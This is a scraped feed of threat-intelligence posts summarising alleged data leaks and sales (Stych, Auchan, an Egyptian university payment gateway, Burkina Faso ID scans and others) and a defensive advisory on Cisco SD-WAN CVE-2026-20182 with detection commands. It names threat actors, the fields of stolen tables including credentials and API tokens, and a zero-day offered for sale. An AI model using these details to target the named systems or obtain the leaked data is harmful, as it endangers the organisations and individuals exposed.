](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/9327859239876839475692873569786235487934.png) [ ![Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/9327859239876839475692873569786235487935.png) Screenshot 2 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/9327859239876839475692873569786235487935.png)[ ![Screenshot 3](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/9327859239876839475692873569786235487936.png) Screenshot 3 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/9327859239876839475692873569786235487936.png) [ ![Screenshot 4](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/9327859239876839475692873569786235487937.png) Screenshot 4 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/9327859239876839475692873569786235487937.png) Want the non-blurred screenshots? Subscribe and check out the threat feed or ransomware feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing) ### DPMPTSP Kabupaten Belu Allegedly Breached: 12.3K+ Business Licensing and Investment Service Records Leaked URL: https://darkwebinformer.com/dpmptsp-kabupaten-belu-allegedly-breached-12-3k-business-licensing-and-investment-service-records-leaked/ Last updated: 2026-05-18T18:37:44.000Z Breach Report · Indonesia # DPMPTSP Kabupaten Belu Allegedly Breached: 12.3K+ Business Licensing and Investment Service Records Leaked A threat actor claims to have leaked a database tied to Dinas Penanaman Modal dan Pelayanan Terpadu Satu Pintu Kabupaten Belu (DPMPTSP), the Indonesian local government agency responsible for investment services and integrated business licensing in Belu Regency. Post details Actor\[Citizen\] Kyyzo SectorGovernment / Business Licensing / Investment Services TypeDatabase Leak Records12.3K+ records CountryIndonesia Date18/05/2026 Compromised data - Business actor and company licensing records - Company names and business registration identifiers - Business permit and application status fields - Business type, scale, and sector information - Address, village, district, and regency location fields - Email addresses and contact person details - Administrative response and authority-related fields - Spreadsheet-style records tied to local government licensing workflows Potential impact The exposed data could be used for business impersonation, phishing, licensing fraud, targeted scams, and social engineering against companies, applicants, and government contacts. Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/332389757862349872134987234987129781.png) Screenshot 1 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/332389757862349872134987234987129781.png) [ ![Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/332389757862349872134987234987129782.png) Screenshot 2 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/332389757862349872134987234987129782.png) Want the non-blurred screenshots? Subscribe and check out the threat feed or ransomware feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing) ### Perm National Research Polytechnic University Allegedly Breached: 362K Internal Student Research System Records Leaked URL: https://darkwebinformer.com/perm-national-research-polytechnic-university-allegedly-breached-362k-internal-student-research-system-records-leaked/ Last updated: 2026-05-18T21:49:31.000Z Breach Report · Russia # Perm National Research Polytechnic University Allegedly Breached: 362K Internal Student Research System Records Leaked A threat actor claims to have leaked a complete database dump tied to Perm National Research Polytechnic University, a major technical university in Russia, from an internal accounting and monitoring system used for student research work. Post details ActorObey\_Your\_Master SectorEducation / Higher Education / Research Administration TypeDatabase Leak Records362,786 rows / \~50MB CountryRussia Date18/05/2026 PriceNot stated What’s allegedly included - Internal university system database records - Student research work accounting and monitoring data - User account and profile records - Email and contact-related fields - Group, department, and faculty-related identifiers - Research supervision and academic workflow fields - CSV tables containing user and faculty/staff-style records Potential impact The exposed data could be used for phishing, impersonation, credential targeting, academic fraud, and social engineering against students, faculty, and university staff. Status Unverified underground forum claim. The actor posted CSV samples and claims the full database dump is available through hidden forum content. Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/8237856297865982385692873569872365987234987231.png) Screenshot 1 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/8237856297865982385692873569872365987234987231.png) [ ![Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/8237856297865982385692873569872365987234987232.png) Screenshot 2 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/8237856297865982385692873569872365987234987232.png) Want the non-blurred screenshots? Subscribe and check out the threat feed or ransomware feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing) ### Stych Allegedly Breached: 1.34M Customer Database Entries Exposed from French Mobility Service Records URL: https://darkwebinformer.com/stych-allegedly-breached-1-34m-customer-database-entries-exposed-from-french-mobility-service-records/ Last updated: 2026-05-15T17:52:12.000Z Breach Report · France # Stych Allegedly Breached: 1.34M Customer Database Entries Exposed from French Mobility Service Records A threat actor claims to be selling a fresh database dump linked to Stych, a French driving school and mobility training platform. The actor alleges the exposed dataset contains more than 1.34M complete customer entries, including identity, contact, location, license-related, and account profile fields. Post details ActorLagui SectorEducation / Driving School / Mobility Services TypeDatabase Leak Records1,342,952 customer entries CountryFrance Date14/05/2026 Compromised data - Customer database records allegedly linked to Stych - Names, titles, and profile identity fields - Email addresses and phone number fields - Postal code, city, and address-related fields - Birth date, nationality, and country-of-birth fields - Driver training and license-related profile attributes - Account status fields including VIP, disability, pension, and student-related indicators Actor claim The dataset is described as fresh, unprocessed customer information being offered through direct contact channels. Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/92378956298376598237569827356986723467892.png) Screenshot 1 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/92378956298376598237569827356986723467892.png) [ ![Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/92378956298376598237569827356986723467893.png) Screenshot 2 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/92378956298376598237569827356986723467893.png) Want the non-blurred screenshots? Subscribe and check out the threat feed or ransomware feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing) ### Auchan Allegedly Breached: 1.29M Customer Database Entries Exposed from French Retail Records URL: https://darkwebinformer.com/auchan-allegedly-breached-1-29m-customer-database-entries-exposed-from-french-retail-records/ Last updated: 2026-05-15T17:34:39.000Z Breach Report · France # Auchan Allegedly Breached: 1.29M Customer Database Entries Exposed from French Retail Records A threat actor claims to be selling a fresh database dump linked to Auchan, the French multinational retail group. The actor alleges the exposed dataset contains more than 1.29M customer entries, including account identifiers, contact details, loyalty-related fields, and address information. Post details ActorLagui SectorRetail / E-commerce / Customer Data TypeDatabase Leak Records1,291,028 customer entries CountryFrance Date14/05/2026 Compromised data - Customer database records allegedly linked to Auchan - Customer IDs and customer number fields - Names and account profile details - Email addresses and mobile phone fields - Address information including city and postal code fields - Loyalty or card-related identifiers referenced in sample records Actor claim The dataset is described as fresh, unprocessed customer information being offered through direct contact channels. Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/723578962398476928357629837468927356928736.png) Screenshot 1 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/723578962398476928357629837468927356928736.png) [ ![Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/723578962398476928357629837468927356928737.png) Screenshot 2 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/723578962398476928357629837468927356928737.png) Want the non-blurred screenshots? Subscribe and check out the threat feed or ransomware feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing) ### Ícaro Cloud Allegedly Breached: Firewall Configs, VPN Keys, TLS Certificates, and Internal Network Data Exposed Across 20 Spanish Corporate Networks URL: https://darkwebinformer.com/icaro-cloud-allegedly-breached-firewall-configs-vpn-keys-tls-certificates-and-internal-network-data-exposed-across-20-spanish-corporate-networks/ Last updated: 2026-05-15T17:18:52.000Z Breach Report · Spain # Ícaro Cloud Allegedly Breached: Firewall Configs, VPN Keys, TLS Certificates, and Internal Network Data Exposed Across 20 Spanish Corporate Networks A threat actor claims to have breached Ícaro Cloud S.L., an Alicante-based managed service provider in Spain, allegedly exposing sensitive configuration data across 20 client networks. The actor alleges the exposed material includes firewall backups, VPN-related secrets, TLS certificates, administrator hashes, plaintext passwords, VLAN maps, and historical network data. Post details Actormacaroni SectorManaged Service Provider / Corporate IT / Network Security TypeData Breach Records20 corporate networks and 3,500+ OPNsense configuration backups CountrySpain Date15/05/2026 Compromised data - Firewall configuration backups allegedly linked to Ícaro Cloud-managed client networks - VPN-related key material and TLS certificate data - Administrator hashes and plaintext password references - VLAN maps and internal network segmentation details - Historical configuration archives spanning multiple client environments - Client network records allegedly affecting organizations across accounting, education, IT services, chemicals, hospitality, real estate, transport, healthcare, and manufacturing sectors The actor claims the exposed material was obtained from reused MSP credentials and is being offered for sale through underground channels. Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/237857823659872356879236598723657983.png) Screenshot 1 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/237857823659872356879236598723657983.png) [ ![Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/237857823659872356879236598723657984.png) Screenshot 2 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/237857823659872356879236598723657984.png) Stop guessing what's redacted. Subscribers see everything → [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing) ### Daily Dose of Dark Web Informer - May 14th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-may-14th-2026/ Last updated: 2026-05-14T22:25:27.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience. [ View details](https://darkwebinformer.com/advertising) 56.2k Unique Visitors 122.1k Pageviews Last 30 days as of May 11, 2026\. Next update June 11th. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources ## 🧾 Today's Intelligence Threat Intelligence ❗️ [mutreasury Allegedly Breached: Admin Credentials and API Keys Exposed From the Egyptian University Payment Gateway Covering 28+ Universities, Sold With a Zero-Day Vulnerability](https://darkwebinformer.com/mutreasury-allegedly-breached-admin-credentials-and-api-keys-exposed-from-the-egyptian-university-payment-gateway-covering-28-universities-sold-with-a-zero-day-vulnerability/) FREE ❗️ [Xacria XNO Allegedly Breached: 446 Service Orders and Subscriber PII Exposed From the Italian Carrier-Grade Telecom Network Orchestration Platform Used by FASTWEB and SKY ITALIA](https://darkwebinformer.com/xacria-xno-allegedly-breached-446-service-orders-and-subscriber-pii-exposed-from-the-italian-carrier-grade-telecom-network-orchestration-platform-used-by-fastweb-and-sky-italia-a-threat/) FREE ❗️ [Burkina Faso Passport & ID Records Allegedly Leaked: 50K+ Scanned Identity Documents Exposed Online](https://darkwebinformer.com/burkina-faso-passport-id-records-allegedly-leaked-50k-scanned-identity-documents-exposed-online/) FREE ❗️ [CVE-2026-20182: Critical Cisco SD-WAN Auth Bypass Under Active Exploitation](https://darkwebinformer.com/cve-2026-20182-critical-cisco-sd-wan-auth-bypass-under-active-exploitation/) FREE X/Twitter Updates ❗️ [CVE-2026-42945: RCE Proof of concept for CVE-2026-42945, a critical heap buffer overflow in NGINX's ngx\_http\_rewrite\_module introduced in 2008](https://x.com/DarkWebInformer/status/2054719764971266052?s=20) ❗️ [🇺🇸 McKissock and Colibri Real Estate allegedly breached: 3,395,138 customer records exposed from the US professional licensing education provider with extortion threat](https://x.com/DarkWebInformer/status/2054932109270172116?s=20) ❗️ [🇫🇷 École Française de Comptabilité allegedly breached: 41 GB and 60,683 student, teacher, and bank documents exposed from the French distance learning institution](https://x.com/DarkWebInformer/status/2054936441973551536?s=20) ❗️ [🇸🇦 Thmanyah allegedly breached: 107,084 subscriber emails and a Bitmovin license key exposed from the leading Arabic podcast and media-tech platform](https://x.com/DarkWebInformer/status/2054949239558463938?s=20) ❗️ [Some open links to scammers CMD Organization:](https://x.com/DarkWebInformer/status/2054944573063905289?s=20) ❗️ [🇺🇸 CoreWeave allegedly breached: full infrastructure access claimed against the US GPU cloud provider that powers OpenAI workloads](https://x.com/DarkWebInformer/status/2054955359480004763?s=20) ❗️ [🚨](https://x.com/DarkWebInformer/status/2054958825954746663?s=20) ❗️ [🇮🇹 KRIA S.r.l. allegedly breached: 2.03 GB of speed and red-light enforcement data exposed from the Italian traffic monitoring technology vendor](https://x.com/DarkWebInformer/status/2054961930058825747?s=20) ❗️ [🇮🇶 Iraqi Ministry of Interior allegedly breached: 2025-2026 census data exposed from the Iraqi government civil registry and vehicle registration systems](https://x.com/DarkWebInformer/status/2054966788836737106?s=20) ❗️ [Note: This claim has not been verified.](https://x.com/DarkWebInformer/status/2054976602635894944?s=20) ❗️ [1/2🇬🇹 Guatemalan Ministry of Finance allegedly breached: 130,000 RGAE registrations and 235,000 sensitive PDFs (324.5GB) exposed via IDOR and unauthenticated APIs](https://x.com/DarkWebInformer/status/2054983250775253320?s=20) 💡 [Governments 2026.](https://x.com/DarkWebInformer/status/2054992865227334035?s=20) ❗️ [🇫🇷 Collège de France allegedly breached: 1.6K records leaked from the historic French higher education and research institution](https://x.com/DarkWebInformer/status/2055012109042508166?s=20) ❗️ [🇫🇷 Union Professionnelle des Professeurs, Cadres et Techniciens du Secrétariat et de la Comptabilité (UP) allegedly breached: 11K records leaked from the French professional association platform](https://x.com/DarkWebInformer/status/2055014068512301329?s=20) ❗️ [1/2🇧🇷 Nuvidio allegedly breached: 40K files including KYC records, biometrics, private keys, customer video calls, and cloud infrastructure data exposed](https://x.com/DarkWebInformer/status/2055016260933652983?s=20) 🚨 [Nightmare Eclipse just released another vulnerability called MiniPlasma](https://x.com/DarkWebInformer/status/2055024386705358967?s=20) ❗️ [🇻🇪 CANTV ABA Ultra allegedly breached: 7.5K subscriber records and 4K OLT/GPON network device records exposed from Venezuelan fiber broadband infrastructure](https://x.com/DarkWebInformer/status/2055033300432118215?s=20) ❗️ [A Scam Tools dataset allegedly leaked: 1.2K user records exposed from a scam-tool platform database](https://x.com/DarkWebInformer/status/2055039444164685890?s=20) ❗️ [🇺🇸⚡ Lightning AI allegedly breached: internal codebase and project files exposed from the creators of PyTorch Lightning](https://x.com/DarkWebInformer/status/2055045072610013445?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### CVE-2026-20182: Critical Cisco SD-WAN Auth Bypass Under Active Exploitation URL: https://darkwebinformer.com/cve-2026-20182-critical-cisco-sd-wan-auth-bypass-under-active-exploitation/ Last updated: 2026-05-14T20:24:34.000Z Critical Vulnerability Alert # CVE-2026-20182: Critical Cisco SD-WAN Auth Bypass Under Active Exploitation Cisco has disclosed and patched CVE-2026-20182, a maximum-severity authentication bypass affecting Cisco Catalyst SD-WAN Controller and Cisco Catalyst SD-WAN Manager. The vulnerability can allow an unauthenticated remote attacker to gain high-privilege access and manipulate SD-WAN fabric configuration. CVE CVE-2026-20182 Severity Critical / 10.0 Weakness CWE-287 Status Exploited ## Executive summary CVE-2026-20182 is not a routine patch-cycle issue. It sits in the SD-WAN control plane, where trust relationships, routing decisions, and fabric-wide configuration are managed. A successful attacker does not need valid credentials; instead, crafted requests can bypass peering authentication and lead to privileged access. What attackers get **Access as a high-privilege internal non-root account, with potential NETCONF access.** Why it matters **NETCONF access can allow manipulation of SD-WAN fabric configuration.** Who is affected **Cisco Catalyst SD-WAN Controller and Manager across multiple deployment types.** What to do **Collect evidence, review logs, and upgrade to a fixed release immediately.** ! **Urgency:** Cisco reports limited exploitation in the wild. CISA has also listed the vulnerability in the Known Exploited Vulnerabilities catalog, making this a priority remediation item for exposed SD-WAN environments. ## What is CVE-2026-20182? CVE-2026-20182 is an improper authentication vulnerability in the peering authentication mechanism used by Cisco Catalyst SD-WAN Controller, formerly vSmart, and Cisco Catalyst SD-WAN Manager, formerly vManage. Cisco states that the mechanism does not work properly, allowing a remote unauthenticated attacker to send crafted requests and bypass authentication. Rapid7’s analysis describes the vulnerable area as the **vdaemon** service over DTLS on **UDP port 12346**, the SD-WAN control-plane peering channel. The end result is severe: an attacker can become an authenticated peer of the appliance and perform privileged operations. ## Affected products and deployment types Cisco says the vulnerability affects Cisco Catalyst SD-WAN Controller and Cisco Catalyst SD-WAN Manager regardless of device configuration. | Category | Exposure | | ------------------------------------ | ------------------------------------------------------------------------- | | On-premises deployment | Affected | | Cisco SD-WAN Cloud-Pro | Affected | | Cisco SD-WAN Cloud, Cisco managed | Affected; Cisco says cloud managed release 20.15.506 addresses the issue. | | Cisco SD-WAN for Government, FedRAMP | Affected | Internet-exposed control components or environments with exposed SD-WAN control-plane ports should be treated as higher risk. ## Fixed releases Cisco states there are no workarounds for CVE-2026-20182\. Remediation requires upgrading to a fixed software release. | Cisco Catalyst SD-WAN release | First fixed release | | ----------------------------- | ---------------------------------- | | Earlier than 20.9 | Migrate to a fixed release | | 20.9 | 20.9.9.1 | | 20.10 | 20.12.7.1 | | 20.11 | 20.12.7.1 | | 20.12 | 20.12.5.4, 20.12.6.2, or 20.12.7.1 | | 20.13 | 20.15.5.2 | | 20.14 | 20.15.5.2 | | 20.15 | 20.15.4.4 or 20.15.5.2 | | 20.16 | 20.18.2.2 | | 20.18 | 20.18.2.2 | | 26.1 | 26.1.1.1 | Cisco notes that some branches have reached end of software maintenance. Organizations on end-of-maintenance releases should prioritize migration to a supported fixed release. ## Potential impact This vulnerability is especially serious because it targets the SD-WAN control plane, not a low-value peripheral service. A successful exploit can allow the attacker to log in as an internal high-privilege account and access NETCONF. From there, the attacker may be able to manipulate SD-WAN fabric configuration. - **Authentication bypass:** no valid user credentials are required to begin exploitation. - **Privileged access:** successful exploitation can produce access as a high-privilege internal account. - **Network-wide consequences:** control-plane compromise can affect routing, trust, and fabric behavior. - **Active exploitation:** Cisco and Talos both report exploitation activity associated with this vulnerability. ## Detection and investigation guidance Cisco recommends preserving potential indicators of compromise before upgrading. Specifically, administrators should collect admin-tech files from each SD-WAN control component, then upgrade as soon as possible. ### Review authentication logs Audit **/var/log/auth.log** for suspicious public-key logins involving **vmanage-admin**, especially from unknown or unauthorized IP addresses. `Accepted publickey for vmanage-admin from ` ### Validate control-plane peering events Review peering events against maintenance windows, known device inventory, expected peer roles, and authorized IP ranges. Pay particular attention to unexpected **vmanage**, **vsmart**, **vedge**, or **vbond** peer activity. ### Check control connection output Cisco advises using the following commands and checking for suspicious **state: up** entries with missing or abnormal challenge acknowledgement behavior: `show control connections detail show control connections-history detail # For Validator: show orchestrator connections detail show orchestrator connections-history detail` If the output indicates possible compromise, open a Cisco TAC case and include CVE-2026-20182 in the case title. ## Recommended response plan **1** ### Preserve evidence Collect admin-tech files from SD-WAN control components before upgrades so forensic data is not lost. **2** ### Review exposure Identify internet-exposed Controller and Manager systems, exposed UDP/12346, and unauthorized access paths. **3** ### Upgrade quickly Move affected systems to Cisco’s fixed releases. There is no workaround that fully addresses this issue. **4** ### Audit logs Search for suspicious vmanage-admin public-key logins and unexpected control-plane peering events. **5** ### Validate peers Confirm every peer system IP, public IP, peer type, and timestamp against known SD-WAN topology. **6** ### Escalate suspected compromise Open a Cisco TAC case if indicators are found, and treat SD-WAN control-plane compromise as a high-priority incident. ## Why this vulnerability deserves immediate attention CVE-2026-20182 combines three high-risk traits: unauthenticated remote reachability, critical control-plane impact, and confirmed exploitation. For SD-WAN environments, control-plane integrity is foundational. If an attacker can impersonate a trusted peer or obtain privileged NETCONF access, the risk extends beyond a single appliance and into the routing fabric itself. Security teams should not wait for broad exploitation before acting. Prioritize fixed releases, reduce unnecessary exposure, and perform compromise assessment on any SD-WAN control component that has been reachable from untrusted networks. ## Sources This post summarizes public advisories and research from Cisco, Rapid7, Cisco Talos, and CISA. - [Cisco Security Advisory: CVE-2026-20182](https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-sdwan-rpa2-v69WY2SW.html) - [Rapid7: Technical Analysis of CVE-2026-20182](https://www.rapid7.com/blog/post/ve-cve-2026-20182-critical-authentication-bypass-cisco-catalyst-sd-wan-controller-fixed/) - [Cisco Talos: Ongoing Exploitation of Cisco Catalyst SD-WAN Vulnerabilities](https://blog.talosintelligence.com/sd-wan-ongoing-exploitation/) - [CISA Known Exploited Vulnerabilities Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) ### Burkina Faso Passport & ID Records Allegedly Leaked: 50K+ Scanned Identity Documents Exposed Online URL: https://darkwebinformer.com/burkina-faso-passport-id-records-allegedly-leaked-50k-scanned-identity-documents-exposed-online/ Last updated: 2026-05-14T19:41:03.000Z Breach Report · Burkina Faso # Burkina Faso Passport & ID Records Allegedly Leaked: 50K+ Scanned Identity Documents Exposed Online A threat actor is advertising a massive collection of allegedly leaked Burkina Faso identity documents, claiming the archive contains more than 50,000 scanned passports and national ID cards in original PDF quality. The post advertises the dataset as including full personally identifiable information (PII) and sample scans of passports and Carte Nationale d’Identité Burkinabè documents. The actor claims the archive size is approximately 32 GB and contains high-quality scanned documents. Post details Actor(s)smiro662 SectorGovernment / Identity Records TypeData Leak Records50,000+ passport & ID records CountryBurkina Faso Date14/05/2026 Compromised data - Scanned Burkina Faso passports in original PDF format - National ID card scans (Carte Nationale d’Identité Burkinabè) - Full personally identifiable information (PII) including names, birth dates, nationality, and identification numbers - Passport document pages with photographs, signatures, and issuing authority details - Identity card records containing addresses, gender, occupation, and expiration dates - Sample archive allegedly distributed through file-sharing links and external hosting services Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/5789623489762983746583972981.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/5789623489762983746583972981.png "Open screenshot 1 in a new tab") [ ![Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/5789623489762983746583972982.png) 02 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/5789623489762983746583972982.png "Open screenshot 2 in a new tab") Want the non-blurred screenshots? Subscribe and check out the threat feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing/) ### Xacria XNO Allegedly Breached: 446 Service Orders and Subscriber PII Exposed From the Italian Carrier-Grade Telecom Network Orchestration Platform Used by FASTWEB and SKY ITALIA URL: https://darkwebinformer.com/xacria-xno-allegedly-breached-446-service-orders-and-subscriber-pii-exposed-from-the-italian-carrier-grade-telecom-network-orchestration-platform-used-by-fastweb-and-sky-italia-a-threat/ Last updated: 2026-05-14T17:15:28.000Z Breach Report · Italy # Xacria XNO Allegedly Breached: 446 Service Orders and Subscriber PII Exposed From the Italian Carrier-Grade Telecom Network Orchestration Platform Used by FASTWEB and SKY ITALIA A threat actor claims to have breached Xacria XNO (Xacria Network Orchestrator), a carrier-grade, cloud-native network orchestration platform used by Tier 1, 2, and 3 telecommunications operators in Italy for zero-touch provisioning and automation of fiber broadband, mobile, and enterprise network services. The actor states the dump includes 446 service orders, full subscriber PII, mobile provisioning records, enterprise circuit data including router CLI commands, and hardcoded security tokens reused across all webhook integrations. Post details Actor(s)\[Citizen\] cc5ab SectorTelecommunications / Network Orchestration TypeData Breach Records446 service orders plus subscriber PII CountryItaly Date14/05/2026 Compromised data - 446 service orders spanning fiber broadband (FTTH/GPON), mobile broadband (MBB), and enterprise EVPN circuits for operators including FASTWEB and SKY ITALIA - Subscriber PII including customer account numbers, IMSI identifiers, MSISDN phone numbers (Italian +39 prefix), MAC addresses, and assigned IP addresses - Mobile subscriber provisioning records with prepaid charging profiles, 5G NSA/SA service status, data quotas, traffic shaping policies, and international roaming configuration - Enterprise circuit data with VDSL access technology, QoS profiles, VLAN assignments, pseudowire IDs, and complete router CLI commands for Cisco IOS-XR, Huawei NE40E, Juniper MX960, and ZTE platforms - Hardcoded security token (value redacted) reused across all webhook integrations to the XFlow workflow engine Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/3237985879263598723568792398765.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/3237985879263598723568792398765.png) Want the non-blurred screenshots? Subscribe and check out the threat feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing/) ### mutreasury Allegedly Breached: Admin Credentials and API Keys Exposed From the Egyptian University Payment Gateway Covering 28+ Universities, Sold With a Zero-Day Vulnerability URL: https://darkwebinformer.com/mutreasury-allegedly-breached-admin-credentials-and-api-keys-exposed-from-the-egyptian-university-payment-gateway-covering-28-universities-sold-with-a-zero-day-vulnerability/ Last updated: 2026-05-14T15:02:53.000Z Breach Report · Egypt # mutreasury Allegedly Breached: Admin Credentials and API Keys Exposed From the Egyptian University Payment Gateway Covering 28+ Universities, Sold With a Zero-Day Vulnerability A threat actor is selling a database from mutreasury, the centralized payment gateway connecting more than 28 Egyptian universities for tuition, application fees, and other student payments. The dump contains administrative credentials, ERP integration API tokens, and the full transaction ledger linking student PII to fee payments through Fawry, e-Finance, and Khales. The seller is also marketing an unauthenticated-access zero-day vulnerability used to dump the data, which they say allows full persistence and real-time data extraction from the remaining 24+ universities not yet included in the public preview. The current public leak covers 4 major university targets as a proof of concept, with the complete dataset covering 28+ Egyptian universities connected to the same centralized infrastructure. Post details Actor(s)INT3X (with credits to quellostanco, CrowStealer, @bigF) SectorEducation / Government / Payment Gateway TypeData Sale + Zero-Day Vulnerability Sale FormatCSV (multiple tables) Records28+ Egyptian universities (4 included in public preview) CountryEgypt Date14/05/2026 Compromised data sysusers.csv Identity & Access - ID, f1 through f14, isAdmin flag, isLocal flag, item\_type - Administrative credentials, internal employee data, access levels - Encrypted and plaintext authentication strings - Job titles and workplace affiliations erpapis.csv Integration Layer - scope\_id, account\_id, connectType - erp\_api\_url, erp\_api\_token, erp\_api\_profile, erp\_company\_name - Live API tokens and endpoint URLs bridging the payment gateway with internal university ERP systems - Direct server-to-server communication credentials efinance\_service.csv Financial Routing - id, sender\_id, foundation\_id, fees, type, is\_active - sender\_name, service\_url, service\_code, service\_name - sender\_password, settlement\_code, confirmation\_url, settlement\_amount - payment\_gateway\_url, sender\_request\_number, sender\_user\_identifier - confirmation\_redirect\_url - Logic and credentials for connecting to national payment providers (e-Finance and Khales) - Settlement codes, service passwords, and redirect flows paymentgetway.csv Transaction Master - UnivId, user\_id, order\_id, FacultyId, SessionId, CustomerId - UniqueInvoiceId, item, Email, Mobile, RefNum, Service, Merchant - UnivName, Result, Status, feesName, fawryFees - notifyurl, PaidAmount, ConfirmedAt, ConfirmedBy, ConfirmedIP - EnquiryDate, FacultyName, CustomerCode, CustomerName - triedConfirm, PaymentMethod, description, SuccessIndicator - Primary ledger for all student payments, logs PII, transaction status, reference numbers (Fawry/Bank), and total amounts across various university faculties paymentgetwaydetails.csv Transaction Details - feeId, UniqueInvoiceId, item, Amount, feeName - Granular breakdown of fees associated with each UniqueInvoiceId - Payment nature specified (Application fees, Tuition, etc.) Zero-Day Vulnerability For Sale - Unauthenticated access exploit - Allows full persistence on the gateway - Enables real-time data extraction from the remaining 24+ Egyptian universities not in the public preview Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/823768598273648972365897263598723589761.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/823768598273648972365897263598723589761.png) [ ![Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/823768598273648972365897263598723589762.png) 02 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/823768598273648972365897263598723589762.png) [ ![Screenshot 3](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/823768598273648972365897263598723589763.png) 03 